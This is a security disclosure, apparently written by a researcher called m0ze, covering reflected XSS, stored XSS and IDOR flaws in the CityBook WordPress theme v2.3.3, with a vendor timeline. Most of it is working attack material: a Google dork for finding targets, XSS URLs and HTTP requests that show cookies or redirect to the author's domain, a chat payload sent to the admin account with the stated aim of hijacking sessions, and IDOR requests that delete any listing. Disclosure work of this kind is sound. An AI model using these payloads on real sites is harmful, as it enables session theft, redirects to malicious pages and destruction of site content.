Multiple vulnerabilities was discovered in the ‘CityBook - Directory & Listing WordPress Theme’, tested version — v2.3.3: - Unauthenticated Reflected XSS - Authenticated Persistent XSS - IDOR Edit (WPScanTeam): December 27h, 2019 - Envato Contacted January 6th, 2020 - Envato Investigating January 7th, 2020 - v2.3.4 released

PoC

-—[]- Info: -[]---- Google Dork: /wp-content/themes/citybook/ Date: 27/12/2019 Demo website: https://citybook2.cththemes.com/ Demo account: m0ze2/asdasd (login/password) PoC listing: https://citybook2.cththemes.com/dashboard/?dashboard=listings -—[]- Reflected XSS: -[]---- Input field with placeholder «What are you looking for?» on the homepage is vulnerable. Any payload will be triggered three times if you use "> in front of it. Same thing with a regular search (block near website logo). Payload Sample #0: "> Payload Sample #1: Payload Sample #2: PoC #0: https://citybook2.cththemes.com/?search_term="><img+src%3Dx+onerror%3Dalert(document.cookie)>#038;location_search&amp;nearby=off&amp;address_lat&amp;address_lng&amp;distance=10&amp;lcats[]= PoC #1: https://citybook2.cththemes.com/?search_term=<img+src%3Dx+onerror%3Dalert(document.domain)>&amp;location;_search=&amp;nearby;=off&amp;address;_lat=&amp;address;_lng=&amp;distance;=10&amp;lcats;[]= PoC #2: https://citybook2.cththemes.com/?search_term="><img+src%3Dx+onerror%3Dwindow.location%3D`https%3A%2F%2Fm0ze.ru`%3B>&amp;location;_search=&amp;nearby;=off&amp;address;_lat=&amp;address;_lng=&amp;distance;=10&amp;lcats;[]= -—[]- Persistent XSS -> Chat: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner). Payload Sample #0: Payload Sample #1: PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 172 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7C405cfe7009dfb008514e88229282ad33155a10e3d6d1c666e2cee90970212542; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7Cbc01a1bfc8e119a186128f522382374eae5a7d80a044290cfd77280880c51de0 action=citybook_addons_chat_reply&_nonce=a75ac6298d&cid;=1230&user;_id=785&touid;=1&reply;_text=%3Cimg%20src%3Dx%20onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E Where: user_id=XXX (your ID; in this example account «m0ze» have ID 785); touid=1 (message receiver ID, in this example ID 1 == account «admin»); reply_text=payload (your payload text). -—[]- Persistent Self-XSS -> Profile: -[]---- Vulnerable input fields: «Phone» and «Address» (will be triggered only on https://citybook2.cththemes.com/dashboard/?dashboard=profile page for current user). Payload Sample #0: "> Payload Sample #1: ">

Greetings from m0ze

Payload Sample #2: "> -—[]- Persistent XSS -> Listing page: -[]---- Add new listing here https://citybook2.cththemes.com/submit/ (first time you need to order a «Free» plan and go to this URL again). Vulnerable input fields: «Listing Address», «Listing Latitude», «Listing Longitude», «Email Address», «Description». «Trainers» section: «Add Member» option with «Name», «Job or Position» and «Description» vulnerable input fields. «Additional Services Fees» section: «Add Service» option with «Service Name» vulnerable input field. «Listing Address» payload also works on the admin dashboard, so it’s possible to steal administrator cookies. Payload Sample #0: "> Payload Sample #1: ">

Greetings from m0ze

Payload Sample #2: "> PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------18467633426500 Content-Length: 5848 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=7610 Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C62973039250bcf64067f2d87460bc142bfc1a6623ea7c5a57cc973245fff0a97; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C1790d7d33689fe6e21ffc2bcd001af3aa10e523b5a701b6f02944a4dd965f170; wp-settings-788=editor%3Dhtml; wp-settings-time-788=1577428516 -----------------------------18467633426500 Content-Disposition: form-data; name=“lid” 7610 -----------------------------18467633426500 Content-Disposition: form-data; name=“listing_type_id” 4901 -----------------------------18467633426500 Content-Disposition: form-data; name=“isSubmit” true -----------------------------18467633426500 Content-Disposition: form-data; name=“hasError” false -----------------------------18467633426500 Content-Disposition: form-data; name=“title” PoC -----------------------------18467633426500 Content-Disposition: form-data; name=“content”

Greetings from m0ze

-----------------------------18467633426500 Content-Disposition: form-data; name=“thumbnail[0]” -----------------------------18467633426500 Content-Disposition: form-data; name=“cats[0]” 50 -----------------------------18467633426500 Content-Disposition: form-data; name=“tags” -----------------------------18467633426500 Content-Disposition: form-data; name=“locations” US| -----------------------------18467633426500 Content-Disposition: form-data; name=“features[0]” 64 -----------------------------18467633426500 Content-Disposition: form-data; name=“features[1]” 84 -----------------------------18467633426500 Content-Disposition: form-data; name=“features[2]” 66 -----------------------------18467633426500 Content-Disposition: form-data; name=“features[3]” 76 -----------------------------18467633426500 Content-Disposition: form-data; name=“working_hours[timezone]” America/New_York -----------------------------18467633426500 Content-Disposition: form-data; name=“working_hours[Monday][static]” enterHours -----------------------------18467633426500 Content-Disposition: form-data; name=“working_hours[Tuesday][static]” enterHours -----------------------------18467633426500 Content-Disposition: form-data; name=“working_hours[Wednesday][static]” enterHours -----------------------------18467633426500 Content-Disposition: form-data; name=“working_hours[Thursday][static]” enterHours -----------------------------18467633426500 Content-Disposition: form-data; name=“working_hours[Friday][static]” enterHours -----------------------------18467633426500 Content-Disposition: form-data; name=“working_hours[Saturday][static]” enterHours -----------------------------18467633426500 Content-Disposition: form-data; name=“working_hours[Sunday][static]” enterHours -----------------------------18467633426500 Content-Disposition: form-data; name=“ltags_names” m0ze -----------------------------18467633426500 Content-Disposition: form-data; name=“post_excerpt” ">

Greetings from m0ze

-----------------------------18467633426500 Content-Disposition: form-data; name=“contact_infos_address” -----------------------------18467633426500 Content-Disposition: form-data; name=“contact_infos_latitude” -----------------------------18467633426500 Content-Disposition: form-data; name=“contact_infos_longitude” -----------------------------18467633426500 Content-Disposition: form-data; name=“gmap” -----------------------------18467633426500 Content-Disposition: form-data; name=“contact_infos_email” -----------------------------18467633426500 Content-Disposition: form-data; name=“contact_infos_phone” -----------------------------18467633426500 Content-Disposition: form-data; name=“contact_infos_website” -----------------------------18467633426500 Content-Disposition: form-data; name=“price_range” moderate -----------------------------18467633426500 Content-Disposition: form-data; name=“price_from” - -----------------------------18467633426500 Content-Disposition: form-data; name=“price_to” - -----------------------------18467633426500 Content-Disposition: form-data; name=“listing_dates” -----------------------------18467633426500 Content-Disposition: form-data; name=“listing_dates_show_metas” -----------------------------18467633426500 Content-Disposition: form-data; name=“lservices[0][service_id]” --imgsrc—imgsrcxonerroralertm0ze88- -----------------------------18467633426500 Content-Disposition: form-data; name=“lservices[0][service_name]” -----------------------------18467633426500 Content-Disposition: form-data; name=“lservices[0][service_desc]” -----------------------------18467633426500 Content-Disposition: form-data; name=“lservices[0][service_price]” - -----------------------------18467633426500 Content-Disposition: form-data; name=“lmember[0][name]” -----------------------------18467633426500 Content-Disposition: form-data; name=“lmember[0][job]” -----------------------------18467633426500 Content-Disposition: form-data; name=“lmember[0][desc]” -----------------------------18467633426500 Content-Disposition: form-data; name=“action” submit_listing -----------------------------18467633426500 Content-Disposition: form-data; name=“_wpnonce” 82b818f99a -----------------------------18467633426500-- -—[]- IDOR #0: -[]---- Delete any post/page/listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 84 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779 Pragma: no-cache Cache-Control: no-cache lid=1770&action;=citybook_addons_delete_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for tag). -—[]- IDOR #1: -[]---- Remove the «Featured» option for any listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 101 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779 lid=1739&lfeatured;=true&action;=citybook_addons_featured_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for tag).